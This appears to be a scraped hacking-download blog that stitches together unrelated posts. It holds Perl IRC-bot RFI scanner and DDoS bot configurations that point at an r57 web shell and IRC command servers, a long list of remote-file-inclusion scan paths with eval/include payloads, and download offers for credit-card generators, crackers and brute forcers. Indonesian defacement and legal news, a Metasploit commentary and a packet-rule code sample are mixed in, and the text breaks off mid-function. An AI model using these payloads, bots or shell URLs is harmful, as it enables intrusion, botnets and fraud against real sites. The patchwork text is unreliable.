V6 Osirys

#!/usr/bin/perl

#####################################################################################

use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;

#######################################################
## CONFIGURATION //
#######################################################

$auth = "Osirys";
$authmail = "osirys\@live.it";
my $id = "http://ciro1992.org/ciao/id.txt??"; #Your RFI Response
my $shell = "http://evilc0der.com/r57.txt?"; #Shell printed on the Vulnerable Site
my $ircd = "irc.kill-9.server.or.id"; #Irc-Server
my $port = "6667"; #Irc-Server Port
my $chan1 = "#malang"; #Chan for Scan
my $chan2 = "#kill-9"; #Results will be printed here too
my $nick = "v6"; #Nick
my @admins = ("arianom");
my $sqlpidpr0c = 1; # This is the number of sites that the bot will test in the same time. For an accurated scann, it's reccomended to set a low number(1)
# (Expecially if you are scanning on 0day bugs), so a lot of presunted vulnerable sites. Unless you will see the bot exiting by an excess flood!
# Instead, if you are scaning on old bugs, so not many results, you can put a higher number, so more speed.
my $rfipidpr0c = 50;

### USEFULL OPTIONS ( 0 => OFF ; 1 => ON )

my $spread = "";

my $spreadACT = 0; #0 ->disabled, 1 ->enabled
my $securityACT = 0; #0 ->disabled, 1 ->enabled
&cheek();
my $killpwd = "lol"; #Password to Kill the Bot
my $chidpwd = "lol"; #Password to change the RFI Response
my $cmdpwd = "lol"; #Password to execute commands on the server
my $secpwd = "lol"; #Passowrd to enable/disable the Security Mode
my $spreadpwd = "lol"; #Passowrd to enable/disable the Spread Mode

my $badspreadpwd != $spreadpwd;
my $badkillpwd != $killpwd;
my $badidpwd != $chidpwd;
my $badcmdpwd != $cmdpwd;
my $badsecpwd != $secpwd;

#######################################################
## END OF CONFIGURATION //
#######################################################

$k= 0;
print q{
------------------------------------------------
__ ___
__ __/ / / __| __ __ _ _ _ _ _ ___ _ _
\ V / _ \ \__ \/ _/ _` | ' \| ' \/ -_) '_|
\_/\___/ |___/\__\__,_|_||_|_||_\___|_|

------------------------------------------------
[+] Coded by Osirys
[+] Contact: osirys[at]live[it]
[+] Keep it private !
[+] *New release, more fun ;)
[+] *Updated to: 18/06/2008

};


Download [complete + Id]

Windows Admin Password Hack 2010


Windows Admin Password Hack:
Forgot your NT admin password?
Reinstall? Oh no… But not any more…

This is a utility to (re)set the password of any user that has a valid (local) account on your NT system.
You do not need to know the old password to set a new one.
It works offline, that is, you have to shutdown your computer and boot off a floppydisk or CD. The bootdisk includes stuff to access NTFS and FAT/FAT32 partitions and scripts to glue the whole thing together.

Will detect and offer to unlock locked or disabled out user accounts!
It is also an almost fully functional registry editor!

Windows Admin Hack allows you to reset the administrator password on
Windows 2000/XP.

The ISO must be burned to a CD or Flash drive.

When it is booted, a mini version of Linux starts which allows the
administrator password to be reset. Useful if you need to work on a
machine whose password is unknown.

Download:

1. Rapidshare
2. Password: www.dl4all.com

Garena Hack 5.7c


Released a new Garena Hack 5.7c.
Garena Hack 5.7c:
- Protection not see running hacks
- Hack is running version 1.23 & 1.24
- No message at the beginning where it is written that your ACC banned ..
- Gold 100 Exp 15 min Basic 50 exp even when you do not play
- No need to wait 5 seconds that would go into the room
- Flooding can be non-stop


Instructions for use:

1) Run the downloaded file in garena.exe folder and log in using your login Garen
2) In the folder with the downloaded Garena Haq Find the file Launch.bat through it we will run!
3) After clicking on Launch.bat blue window will appear where you must select the option for which version Var3 its run or even separately!
4) In this blue box, click 1 and enter, then we test fails, skip it and press any key)
5) Everything is ready:
Go through Launch.bat only the folder.

Download:
1. Uploading
2. Mirror

Hacking Wep Tutorials



I found out how to hack WEP, and now I have written it in Notepad and am posting it for you.
I downloaded all the tools for you, so you will have everything you need.
Some antivirus programs see "aircrack-ng-1.0-win" as a virus, but it's a cracking tool.
I hope I helped you guys.
It has only 12 steps and 2 tools that you need; for the tutorials, look for "Wep Hack tutorials",
you can't miss it. Good luck and have fun.

Download : (size :4408 KB)
1. Rapidshare
2. Password: www.dl4all.com

Bjork Scanner

!/usr/bin/perl
###############################################
# Im not living im just killing time
# radiohead ganja bjork the beatles
###############################################
use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;
##################################################
# Im not living im just killing time
# radiohead ganja bjork the beatles
##################################################
my @ps = ("/usr/sbin/ateam","/usr/local/apache/bin/httpd -DSSL","/sbin/syslogd","[eth0]","/sbin/klogd -c 1 -x -x","/usr/sbin/acpid","/usr/sbin/cron","[httpds]","/usr/sbin/httpd","[bash]");
$processo = $ps[rand scalar @ps];
my $linas_max='2';
my $sleep='3';
my $cmd="im.not.living.im.just.killing.time";
my $id="http://www.aigleboots.com//administrator/components/com_virtuemart/.../ID.txt?";
my $spread="http://www.aigleboots.com//administrator/components/com_virtuemart/.../sprd.txt?";
my $spreads="http://www.aigleboots.com//administrator/components/com_virtuemart/.../sprd.txt?";
my @adms=("arianom","kamtiez","!");
my @canais="#kill-9";
##################################################
# Im not living im just killing time
# radiohead ganja bjork the beatles
##################################################
my @nickname = ("killer");
my @rname = ("cailio");
my $nick = $nickname[rand scalar @nickname];
my $ircname = $nickname[rand scalar @nickname];
my $realname = $rname[rand scalar @rname];
$servidor='irc.kamtiez.punked.us' unless $servidor;
my $porta='7000';

etc..

Download Full Scanner

Hack Credit Cards



Generate valid Credit card numbers with their cvv numbers. Hack with their Valid Complete details and have some great fun.

Download:

1.Hotfile

Bugs Tested

.scan /components/com_joomlalib/standalone/stubjambo.php?baseDir= “/index.php?option=com_easybook”
.scan /assets/snippets/reflect/snippet.reflect.php?reflect_base= “/index.php?id=50?
.scan /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection{}eval($_GET[w]);class%20zZz_ADOConnection{}//&w=include($_GET[a]);&a= “Diese Seite wurde mit der quelloffenen Software CMS Made Simple erstellt.”
.scan /members/?INC= “YourWebsitename gives you the best search results and keyword bidding.”
.scan /members/?INC= “If You lost password enter Your login:”
.scan2 ////////?cmd&file= “index.php?cmd=10?
.scan2 /include/admin.lib.inc.php?site_path= /list.php?bbs_id=
.scan2 /components/com_joomlalib/standalone/stubjambo.php?baseDir= “option,com_joomlalib”
.scan2 /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath= “/plugins/mygallery/”
.scan2 /skins/advanced/advanced1.php?pluginpath[0]= “/advanced2.php”
.scan2 /admin/auth.php?xcart_dir= “/pages.php?pageid=3? -p 200
.scan2 /admin/auth.php?xcart_dir= “/admin/auth.php?xcart_dir=”
.scan2 /?sourcedir= “/QueryString.php”
.scan2 /skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path= “/board.php?board=”
.scan2 ?sourcedir= index.php?sourcedir=
.scan2 /components/com_joomlalib/standalone/stubjambo.php?baseDir= /index.php?option=com_gallery2
.scan2 /bemarket/postscript/postscript.php?p_mode= /bemarket/
.scan2 /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection{}eval($_GET[w]);class%20zZz_ADOConnection{}//&w=include($_GET[a]);&a= /index.php?mact= -p 200
.scan2 /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection{}eval($_GET[w]);class%20zZz_ADOConnection{}//&w=include($_GET[a]);&a= News,cntnt01,detail,0&cntnt01articleid= -p100
.scan2 /stats.php?dir[func]=&dir[base]= “mygamingladder” “my gaming ladder”
.scan2 /extras/poll/poll.php?file_newsportal= “/post.php?newsgroups=”
.scan2 /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= “com_sitemap”
.scan2 /autoclose.php?subd= “Help Desk Software By Kayako eSupport v3.10.02?
.scan2 /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act= “/board.php?board=”
.scan2 /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act= “/kboard.php?board=notice”
.scan2 /inc/shows.inc.php?cutepath= “Translated by Slaver”
.scan2 /themes/default/index.php?main= “cfagcms” “cfagcms”
.scan2 /themes/default/index.php?main= “cfag cms”
.scan2 /comments.php?id={${include($ddd)}}{${exit()}}&ddd= “poll_ssi.php”
.scan2 /poll/comments.php?id={${include($ddd)}}{${exit()}}&ddd= “/poll_cookie.php”
.scan2 /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path= “/index.php?option=com_content” xoo
.scan2 /admin.php?include_path= “Powered by Lazarus Guestbook from carbonize.co.uk”
.scan2 /classes/Import_MM.class.php?g_rb_basedir= “PHPRecipeBook”
.scan2 /?sIncPath= “Copyright © 2008 Your Company.”
.scan2 /?sIncPath= “/index.php?members_mode=”
.scan2 /?sIncPath= “/index.php?members_mode=top”
.scan2 /?sIncPath= “index.php?tags_mode=profile”
.scan2 /common/db.php?commonpath= “playing.php”
.scan2 /update/update2.php?lang= photokorn 1.53
.scan2 /index.php?view=page&pagename= “/?view=main&cityid=”
.scan2 /index.php?view=page&pagename= “You have an error in your SQL syntax;”
.scan2 /index.php?view=page&pagename= “/?view=selectcity&targetview=post&cityid=-3〈=en”
.scan2 /index.php?load= “/index.php?load=home”
.scan2 /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir= “/index.php?module=Pagesetter”
.scan2 /index.php?view=page&pagename= “/?view=main&cityid=”
.scan2 /index.php?view=page&pagename= “You have an error in your SQL syntax;”
.scan2 /index.php?view=page&pagename= “/?view=selectcity&targetview=post&cityid=-3〈=en”
.scan2 /page.php?id= “RCMS-Pro”
.scan2 /page.php?id= “©2005 – 2006 Roosevelt Purification. RGameScript is a free software under GNU/GPL License”
.scan2 /page.php?id= “/index.php?id=cats”
.scan2 /function.inc.php?path= “ACGVclick” “ACGVclick”
.scan2 /assets/snippets/reflect/snippet.reflect.php?reflect_base= “MODx” “MODx”
.scan2 /assets/snippets/reflect/snippet.reflect.php?reflect_base= “MODx Parse Error”
.scan2 /assets/snippets/reflect/snippet.reflect.php?reflect_base= “/index.php?id=5?
.scan2 /assets/snippets/reflect/snippet.reflect.php?reflect_base= “/index.php?id=1&start=10?
.scan2 /tools/send_reminders.php?noSet=0&includedir= “WebCalendar v1.1.0c-CVS”
.scan2 /assets/snippets/reflect/snippet.reflect.php?reflect_base= “snippets/reflect”
.scan2 /assets/snippets/reflect/snippet.reflect.php?reflect_base= “MODx CMS”
.scan2 /assets/snippets/reflect/snippet.reflect.php?reflect_base= “My MODx Site is powered by MODx Content Management System”
.scan2 /index.php?view=page&pagename= “Buy, sell, trade, date, events… post anything”
.scan2 /index.php?view=page&pagename= “Thank you for stopping by my site. Here you can leave your mark.”
.scan2 /includes/function_core.php?web_root= “Mp3 Rating”
.scan2 /?mosConfig_absolute_path= “Powered by Joomla!”
.scan2 /modules/Forums/admin/admin_words.php?phpbb_root_path= “Hebrew Ver. HebNukeR 2.0 © 2004 by HebNukeR.org. All Rights Reserved”
.scan2 /index.php?option=com_custompages&cpage= Joomla custompages
.scan2 /booth.php?include_path= “/poll_cookie.php”
.scan2 /update/update2.php?lang= “photo foto gallery bilder tauchen wracks galerie”
.scan2 /header.php?base_folder= “Powered by Bab.stats”
.scan2 /tools/send_reminders.php?noSet=0&includedir= WebCalendar v1.0RC3 (11 Mar 2005)
.scan2 /booth.php?include_path= “/poll_cookie.php”
.scan2 /index.php?cmd&file= “Membre avec photos seulement ?”
.scan2 /index.php?cmd&file= “%22HOME%22+%22%7C%22+%22UPLOAD+YOUR+PHOTO%22+%22%7C%22+%22LATEST+USERS%22+%22%7C%22+%22TOP+10%22+%22%7C%22+%22TOP+GUYS%22+%22%7C%22+%22TOP+GIRLS%22+%22%7C%22+%22CONTACT%22?
.scan2 /index.php?cmd&file= “List Users with Pics only?”
.scan2 /index.php?cmd&file= “So you think you’re HOT?”
.scan2 /contenido/external/frontend/news.php?cfg[path][includes]= Contenido Login
.scan2 /contenido/external/frontend/news.php?cfg[path][includes]= “Contenido Login” “Contenido Login”
.scan2 /clmcpreload.php?CLPATH= “CaLogic” “Calendars”
.scan2 /txt-db-api/txt-db-api.php?API_HOME_DIR= “linkmix” “linkmix” “linkmix”
.scan2 /cms/system/openengine.php?oe_classpath= “/cms/website.php?id=/de/”
.scan2 /modules/Forums/admin/admin_words.php?phpbb_root_path= “Thai Edition by ThaiNuke”
.scan2 index.php?custompluginfile[]= “Sorry, your account does not have access to submit information”
.scan2 include/editfunc.inc.php?NWCONF_SYSTEM[server_path]= /index.php?nwaction=shownews
.scan2 include/editfunc.inc.php?NWCONF_SYSTEM[server_path]= /article.php?article_file=
.scan2 include/editfunc.inc.php?NWCONF_SYSTEM[server_path]= “Newswriter” “Newswriter”
.scan2 /modules/coppermine/themes/coppercop/theme.php?THEME_DIR= “coppermine” “coppermine” “coppermine”
.scan2 /config.inc.php?path_escape= “Your Personal Search Advisor !”
.scan2 /include/scripts/export_batch.inc.php?DIR= “ModernBill”
.scan2 /config/config_admin.php?INC= “YourWebsitename gives you the best search results and keyword bidding.”
.scan2 /config/config_admin.php?INC= %22home%22+%22%7C%22+%22login%22+%22%7C%22+%22add+your+site%22+%22%7C%22+%22affiliate+program%22+%22%7C%22+%22privacy%22+%22%7C%22+%22terms%22
.scan2 /include/admin.lib.inc.php?site_path= /view.php?bbs_id=
.scan2 /clmcpreload.php?CLPATH= “© Philip Boone”
.scan components/com_virtuemart/install.php?mosConfig_absolute_path= “powered by VirtueMart”
.scan includes/archive/archive_topic.php?phpbb_root_path= IntegraMOD
.scan components/com_moofaq/includes/file_includer.php?gzip=0&file= "com_moofaq"
.scan /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path= /com_fabrik/
.scan /index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path= /com_fabrik/
.scan /snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir= snippetmaster
.scan2 ?dir[func]=&dir[base]= "Ladder Scripts"
.scan /accounts/inc/errors.php?error= "Powered By: Merak Mail Server Software"
.scan conf.php?subdir= "wow roster"
.scan /config/config_admin.php?INC= "Keyword" "Add Your Site"
.scan src/admin/pt_upload.php?config_file=[localserverfile]&ptconf[src]=
.scan ?INCLUDE_FOLDER= "e404.php"?*.st"
.scan /?_zb_path= "/bbs/" "/zboard/"
.scan //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path= index.php
.scan source/mod/rss/viewitem.php?Codebase= ED Engine
.scan source/mod/rss/channeledit.php?Codebase= WebEd
.scan prepare.php?xcart_dir= "X-CART. Powerful PHP shopping cart software"
.scan /admin/frontpage_right.php?loadadminpage= Copyright � 2007 Agares Media
.scan /index.php?get= inurl”index.php?get=”
.scan /index.php?target= inurl”index.php?target=”

Indonesian Crackers Take Down a Malaysian Site Again

JAKARTA - Indonesian crackers have struck a Malaysian-owned site again. This time the victim of the attack is the Malaysia Natural Heritage site.

Okezone's monitoring on Sunday (3/1/2010) of the site at http://malaysianaturalheritage.com/ showed that its appearance had been altered. Large text was clearly visible over an image of the Malaysian flag. The text claimed that the site belongs to the People of Indonesia.

"This site is claimed by the People of Indonesia," the text read.

In addition, the cracker, who used the name Arianom, also wrote a number of messages disparaging Malaysia, such as "A country without culture, fond of stealing Indonesian culture," he wrote.

The back-and-forth attacks between Indonesia and Malaysia in cyberspace seem to have no end. Previously, in September 2009, Indonesian crackers also attacked Malaysian sites.

At least around 50 Malaysian sites were hit by Indonesian crackers at that time. Besides flying the red-and-white flag virtually, they also embedded a shoutbox that let visitors to the hacked sites leave comments. (ugo)

Source Code DDOS

#!/usr/bin/perl

use IO::Socket;
use IO::Select;
use Socket;
#####################
my $processo = '/usr/sbin/httpd';
my $linas_max='8';
my $sleep='0';
my $id="http://tdos.org/images/log.png??";
my @adms=("tukulesto","kaMtiEz");
#my @hostauth=("1980");
my @canais=("#indonesiancoder");
my $nick = "DDoSer";
my $ircname ='GodFather';
chop (my $realname = 'GF');
$servidor='xadmin.indonesiancoder.us' unless $servidor;
my $porta='7000';
#####################
# Eof Configuration #
#####################
$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';
use IO::Socket;
use Socket;
use IO::Select;
chdir("/");

Download Free

140 Amazing Hacks For your PC


140 Amazing Hacks For your PC!(6MB)

Some of the hacks which this article contains are:
How to call your friends with their own number Extreme Hack
How to Hack a MySpace Account
how Web 2.0 Logos Are Drawn in Photoshop
Photoshop Tips and Tricks
Rapidshare Hack,No waiting for 15 mins
Shutdown Command Via Command Prompt
Talk 2Desktop
VODAFONE HACK FOR FREE GPRS!
Where The Saved Passwords Stores In Windows Xp & Vista - Must for hackers and Beginners
Windows Genuine Hack – 100 percent Works
Wireless Hacking
Call Anywhere in the World From PC to Mobile For Free 100% Working Hack Using Skype and Yahoo Messenger Full Tutorial
Chat with Friends through ms dos Command Prompt
Create Your Own Instant Messenger Bot
Format A HDD With Notepad
Free Calling to Any US Phone From Your iPhone
Google Hacking
And several more...

Free Download:
1. Rapidshare
2. Password: www.dl4all.com

Ultra Hacker 155 in 1


155 Hack Tools All in One:
Anon FTP
BMP Ripper
CIA 10
FTP BR
Hack the game
Brutus
Genxe
AsPack 21
Hack flash template
Hydra
Hack My space
Blaster W32
and more...

Note: these are hack tools and may be detected as viruses/spyware by antivirus/spyware programs. Use at your own risk.


Free Download:

1. Rapidshare

Full Hack Pack 2009 [Exclusive]


New Hacking Tool-s 2009 for Georgia Hacking Community

Download
1. Hotfile

Wifi Hacks 2009 AIO


Wifi Hacks 2009 AIO | 128 MB

This tool has many different tools to hack and crack wifi so you can use your neighbours internet and do whatever. Tools for Windows and Linux also some nice extra tools!
* Aircrack
* Wireshark
* Ettercap
* Netstumbler
* Airsnare
* WIFIfofum
* Wdriver
* and much more...

Linux Hacks:
* Airpwn
* WEPcrack
* Prismstumbler
* WIFIscanner
* Airfart
* Magicmap
* WPA-cracker
* Wellenreiter
* and much more..

Free Download
1. Hotfile

Wireless Hack Toolz 2009


Wireless Hack Toolz 2009 AIO

1.NetStumbler-0.4.0
2.Kismet-2005-08-R
3.Wellenreiter-v1.9
4.WEP 0.1.0
5.Airsnort-0.2.7e
6.Wepwedgie-0.1.0-alpha
7.Hotspotter-0.4

Free Download:
1. Rapidshare

Dangerous Hack Tool 2010


The Most Dangerous Hack Tool 2010

Binders
- Daemon Crypt Public v2
- NT Packer v2.1
- EES binder v1.0
- File Injector v3
- Bytes Adder
- FreshBind v2.01
- YAB v2.01
- NakedBind v1.0
- Amok Joiner


Brute Forcers

- Munga Bunga ’s Official
- Brutus - Authentication Engine Test 2
- wwwHack v1.946
- FTP Brute Hacker
- FTP Brute Forcer.tar.gz - Unix
- Wbrute.tar.gz - Unix
- Shadow Scanner-Brute Forcer
- Hackers Utility v1.5
- POP3 brute forcer.tar.gz - Unix

CGI-Bug Scanners
- NStealth HTTP Security Scanner v5.8
- Attack Toolkit v4.1 & source code included
- Scanarator
- Legion NetBios Scanner v2.1
- NetView v1.0
- CGI Vulnerability Scan
- CGI Scanner v4.0
- VoidEye CGI scanner
and much more....

EXTRA!
- Telnet Tutorial

Download link:
1. Hotfile
2. Password: crazy-coderz.net

KingCripts Hacking Pack

AIO | KingCripts Hacking Pack (Legionares™) | 35.97 MB



Download Links: NO MIRROR PLEASE


1. Download Link: Depositfiles (US, DE, ES, UK, FR, RU, IT, CA, PT, NL, BE)
Download from DepositFiles

1. Download Link for other Countries:
Download it from HotFile

ESET Nod32 Keys Finder V7



What's New In V.7 :-
- NodLogin updated to version V10c
- TNod User & Password Finder updated to V1.3 (F!NAL)
- New Sites For Nod Keys added
- Portable Versions - Installation not needed!

Download:
1. Hotfile
2. Rapidshare

A.I.O USB Utilities Tools

A.I.O USB Utilities Tools 2010 V2 (Size: 38,2 MB)

All Software are latest versions
Flash Boot V1.4
USB Disk Security 5
USB Trace
Win SETUP From USB 1.1
Urescue
USB Firewall 1.1.3
USB Stick Locker
USB AntiVirus 2.3
USB Disk Eject

Download
1.Hotfile
2. Rapidshare

Hacking Tools - 85 in 1




Audio-theme: Sean Paul - Temperature

Main page:
- HOTMAIL HACKING
- YAHOO HACKING
- MSN FUN TOOLS
- FAKE SCREENS/PAGES
- OTHER HACKING TOOLS
- FUN TOOLS


Download Free:

1. USA, EU and Russia
Download here
2. Other countries:
Download here

Metasploit Framework

The Metasploit Project is ostensibly a group formed to "provide useful information to people who perform penetration testing, IDS signature development, and exploit research."

Their latest release, the Metasploit Framework version 2.0, claims to be "an advanced open-source platform for developing, testing, and using exploit code."

While it is true that the tools and functionality built in to the Metasploit Framework might prove valuable for a security auditor or penetration tester to use in verifying the security of a system or network, it is probably as true or more so that script-kiddies and other wannabe hackers or developers of malicious code might put this tool to use as an express lane or fast track to help them create exploits and malware.

I don't really know enough about the Metasploit Project or the developers who have worked on this utility to say whether their motives were pure. It seems that often the line between providing network security and breaking network security is a thin one and it doesn't take much for some otherwise rational people to accuse security researchers or administrators of less than honorable intentions. Some presume that anyone in network security is also a hacker on the side and many question the true intent of tools which double as powerful weapons for script-kiddies.

Even if we assume that their goal truly is to provide useful information and tools to help further the cause of development and security research, it doesn't change the fact that the tool is available for all to download and there is no way to predict or control what the end user will do with it.

The Metasploit Project says that their Metasploit Framework can be compared with expensive commercial products such as Immunity's CANVAS or Core Security Technology's Core Impact. These tools also provide the same or similar functionality. One of the main reasons that they have not come under the scrutiny that the Metasploit Framework has is the pricetag. Since few can afford these packages they pose little risk, but if you take that same power and distribute it freely there is a greater concern that the wrong people will use it for the wrong reasons.

The Metasploit Framework seems to be a powerful tool. I downloaded a copy myself to play with- on my own network against my lab computers. I think that for security administrators it may prove valuable in the battle to ensure your computer and network security and make sure you are protected. But, I think we may also start to see new exploits and malware hitting the streets once the script-kiddies start playing with this tool and learning just how powerful it can be as a weapon.

Download Free:
1. Metasploit For Windows
2. Metasploit For Linux

Network Spy 2.0

Network Spy is a general purpose diagnostic tool for administrators, programmers and students of network technologies. It can operate in different modes depending on the application. Some of the more typical applications of this tool include:

1. Packet capture and decode
2. Network Statistics gathering
3. Software debugging
4. Intrusion Detection and activity monitoring

Packet Capture and Decode
In this mode, Network Spy can be used to get a snapshot of data from an Ethernet network. It is capable of decoding the most widely used IP protocols such as UDP, TCP and ICMP. It also allows you to save this data for later analysis. The decoded packets are displayed in human-readable form.
Network Statistics gathering
In this mode, the amount of data attributed to a certain activity can be captured. For instance, if you want to monitor how much data is transferred between user x and excite.com, you can specify a rule to keep a track of amount of this data. Another example is keeping track of how much FTP data flows on your network.
Software Debugging
People programming network software and web applications will find this tool extremely useful. It can be used to debug application to find errors in code, compute bandwidth utilization and find bottlenecks.
Intrusion Detection and Activity Monitoring
Using the new rules-based filtering mechanism, one can capture packets of interest, avoiding a huge capture of all packets on the network. A rule specifies a pattern to match. For instance, one could specify to capture all ICMP packets where TTL=1. This would be true when someone is performing a traceroute. Similarly, you could specify a rule to capture all TCP packets where the destination port is 23 and the SYN flag is true to find out how many telnet connections are being established.
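The two rules named above (ICMP with TTL=1, and TCP to port 23 with SYN set) can be expressed as field conditions over decoded IPv4 headers. The following is an added example, not Network Spy's own code or rule syntax; the rule names, helper functions and sample packets are constructed for illustration.

```python
import struct

PROTO = {1: "icmp", 6: "tcp", 17: "udp"}
SYN, ACK = 0x02, 0x10

# The two rules from the text, written as "field == value" conditions.
# Rule names are hypothetical labels, not Network Spy identifiers.
RULES = {
    "traceroute-probe": {"proto": "icmp", "ttl": 1},
    "telnet-connect": {"proto": "tcp", "dport": 23, "syn": True},
}


def parse_ipv4(pkt):
    """Decode the fields the rules need from a raw IPv4 packet, or return None."""
    if len(pkt) < 20 or pkt[0] >> 4 != 4:
        return None
    ihl = (pkt[0] & 0x0F) * 4          # header length in bytes (options allowed)
    if ihl < 20 or len(pkt) < ihl:
        return None
    frag_offset = struct.unpack("!H", pkt[6:8])[0] & 0x1FFF
    fields = {
        "ttl": pkt[8],
        "proto": PROTO.get(pkt[9], str(pkt[9])),
        "src": ".".join(map(str, pkt[12:16])),
        "dst": ".".join(map(str, pkt[16:20])),
    }
    l4 = pkt[ihl:]
    # Only the first fragment carries the TCP header; a truncated header
    # is left undecoded so port/flag rules cannot match on garbage.
    if pkt[9] == 6 and frag_offset == 0 and len(l4) >= 14:
        fields["sport"], fields["dport"] = struct.unpack("!HH", l4[:4])
        fields["syn"] = bool(l4[13] & SYN)
        fields["ack"] = bool(l4[13] & ACK)
    return fields


def matches(fields, rule):
    """A rule matches when every listed field is present and equal."""
    return all(fields.get(key) == value for key, value in rule.items())


def count_matches(packets, rules=RULES):
    """Return {rule name: number of matching packets}."""
    counts = {name: 0 for name in rules}
    for pkt in packets:
        fields = parse_ipv4(pkt)
        if fields is None:
            continue                    # not IPv4 or too short to decode
        for name, rule in rules.items():
            if matches(fields, rule):
                counts[name] += 1
    return counts


# --- constructed sample packets (checksums left at 0, never validated) ---
def _ip(proto, ttl, payload, src="10.0.0.5", dst="10.0.0.9"):
    addr = lambda s: bytes(int(o) for o in s.split("."))
    header = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload),
                         0, 0, ttl, proto, 0, addr(src), addr(dst))
    return header + payload


def _tcp(dport, flags, sport=40000):
    return struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, flags, 8192, 0, 0)


def _icmp_echo():
    return struct.pack("!BBHHH", 8, 0, 0, 1, 1)


SAMPLE = [
    _ip(1, 1, _icmp_echo()),                  # ICMP, TTL=1: first traceroute hop
    _ip(1, 64, _icmp_echo()),                 # ordinary ping
    _ip(6, 64, _tcp(23, SYN)),                # telnet connection attempt
    _ip(6, 64, _tcp(23, SYN, sport=40001)),   # second telnet attempt
    _ip(6, 64, _tcp(23, ACK)),                # established telnet traffic
    _ip(6, 64, _tcp(80, SYN)),                # HTTP connection attempt
    _ip(6, 1, _tcp(23, SYN))[:28],            # TCP header cut short: undecoded
    b"\x45\x00",                              # truncated capture: skipped
]

if __name__ == "__main__":
    for name, hits in count_matches(SAMPLE).items():
        print(f"{name}: {hits}")
```
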

Network Spy also includes various other tools such as DNS Lookup, Ping, TraceRoute and Whois to aid in everyday tasks.


Other Features

* No bloat software, small and fast executables.
* Easy installation (requires no reboot) and uninstall.
* Dynamically loaded drivers at runtime.
* Simple user-interface.
* View network traffic in realtime.
* Capture packets on a remote network.


System Requirements

* Windows 95/98/NT/2000/XP.
* An Ethernet Adapter (MS Dialup Adapters are not supported).


Download now!

You may download Network Spy and evaluate it. The evaluation version of Network Spy is restricted to 3 minutes of capture at a time.

Download : netspy.exe (545 KB)

"ITE Law Is Problematic in Its Application"

VIVAnews - Constitutional Court (MK) Chief Justice Mahfud MD stressed that the institution he leads does not have the authority to repeal the Electronic Information and Transactions (ITE) Law.

"Repealing a law is a political initiative," Mahfud said on Tuesday, 22 December 2009. He stressed that the institution with the authority to repeal a law is the legislature, not the Constitutional Court.

This was in response to a number of legal cases linked to the ITE Law, among them Omni International Hospital's lawsuit against Prita Mulyasari and the infotainment workers' lawsuit against the artist Luna Maya.

The MK, he said, only has authority if the law in question conflicts with the 1945 Constitution. "That law does not conflict with it," he added.

The same goes for the question of whether or not a law may remain in force. Mahfud said that is also not the MK's domain. "That is the legal policy of the government and the DPR," he said at his office.

Another alternative, he continued, is that the Minister of Law and Human Rights, Patrialis Akbar, could also take the initiative. "Draft a bill to replace it," he explained. "That is, if he wants to," Mahfud added.

Mahfud further explained that the law used to charge Prita Mulyasari had once been submitted for judicial review at the Constitutional Court. The petition was rejected because the rationale behind the ITE Law was judged to be strong and constitutional. "It can be repealed, but it is not the MK that declares it," he said.

According to Mahfud, the defamation article in the ITE Law is already correct. "The problem is its application," he said. At present, he considers that citizens' rights must be protected, including from rogue short message service (SMS) messages. "Also to keep people from sending rogue SMS," Mahfud said, giving an example.

Tifatul: ITE Law Has Several Irregularities


VIVAnews - The government has stated that the Electronic Information and Transactions Law (UU ITE) can be revised. The Minister of Communication and Informatics, Tifatul Sembiring, said the ITE Law does have several irregularities.

Tifatul said he would compile the points in the ITE Law that are considered problematic. "We will collect these first," he said at the office of the Coordinating Minister for the Economy, Jakarta, on Wednesday, 23 December 2009.

Tifatul himself, for example, sees that for the article on insult the penalty should be 6 months. But the article imposes 6 years.

Previously, Constitutional Court (MK) Chief Justice Mahfud MD stressed that the institution he leads does not have the authority to repeal the Electronic Information and Transactions (ITE) Law.

"Repealing a law is a political initiative," Mahfud said on Tuesday, 22 December 2009. He stressed that the institution with the authority to repeal a law is the legislature, not the Constitutional Court.

This was in response to a number of legal cases linked to the ITE Law, among them Omni International Hospital's lawsuit against Prita Mulyasari and the infotainment workers' lawsuit against the artist Luna Maya.

LAN Hacking Tutorial (Newbie)

First of all, sorry if this is a repost, because this technique is not a fresh one in the hacking world, but it is not stale either: it can still be used today because most networks are hub & switch networks that are not encrypted.
Why are they not encrypted?
* Network admins are mostly IT people who specialise in writing programs,
not in network security
* With encryption the bandwidth required goes up, and of course the already
slow internet connection gets even slower and pages end up erroring out
* Encrypted equipment is not cheap to obtain

This hack uses the following techniques:
* Sniffing
* ARP Poison Routing

Neither of the techniques above can be prevented by any firewall on the victim's computer, guaranteed.
Important Note: ARP Poison Routing can cause denial of service (DoS) on one or all of the computers on your network
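A host firewall does not inspect ARP, but the forged replies that ARP Poison Routing depends on are visible to anyone monitoring the segment. The following is an added example, not part of the original tutorial: a passive watcher that flags IP-to-MAC binding changes, one MAC claiming several IPs, and an Ethernet source that disagrees with the ARP sender field. The addresses, frames and the trust-first-seen baseline are assumptions made for the illustration; untagged Ethernet II frames are assumed.

```python
import struct
from collections import defaultdict


def _mac(raw):
    return ":".join(f"{b:02x}" for b in raw)


def _ip(raw):
    return ".".join(str(b) for b in raw)


def parse_arp(frame):
    """Return the ARP fields of an untagged Ethernet II frame, or None."""
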